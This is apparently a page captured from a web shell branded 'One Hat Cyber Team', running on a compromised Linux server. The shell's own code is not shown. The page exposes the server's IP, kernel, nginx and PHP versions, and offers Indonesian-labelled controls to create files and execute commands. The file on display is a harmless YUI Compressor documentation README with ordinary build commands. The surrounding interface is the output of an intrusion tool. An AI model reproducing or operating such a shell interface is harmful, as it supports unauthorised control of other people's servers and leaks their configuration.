⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.1
Server IP:
185.238.29.86
Server:
Linux server2 6.8.12-6-pve #1 SMP PREEMPT_DYNAMIC PMX 6.8.12-6 (2024-12-19T19:05Z) x86_64
Server Software:
nginx/1.18.0
PHP Version:
8.1.31
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
doc
/
yui-compressor
/
View File Name :
README.md
YUI Compressor Docs =================== These docs are what powers http://yui.github.com/yuicompressor They are powered by [Selleck](http://yui.github.com/selleck). ```terminal $ npm -g install selleck ``` How to build them ----------------- ```terminal $ git clone git://github.com/yui/yuicompressor.git $ git clone git://github.com/yui/yuicompressor.git yuicompressor-pages cd yuicompressor-pages git fetch git checkout -t gh-pages ``` This should pull the `gh-pages` branch locally. ```terminal cd ../yuicompressor/docs/ selleck -o ../../yuicompressor-pages/ ``` Done!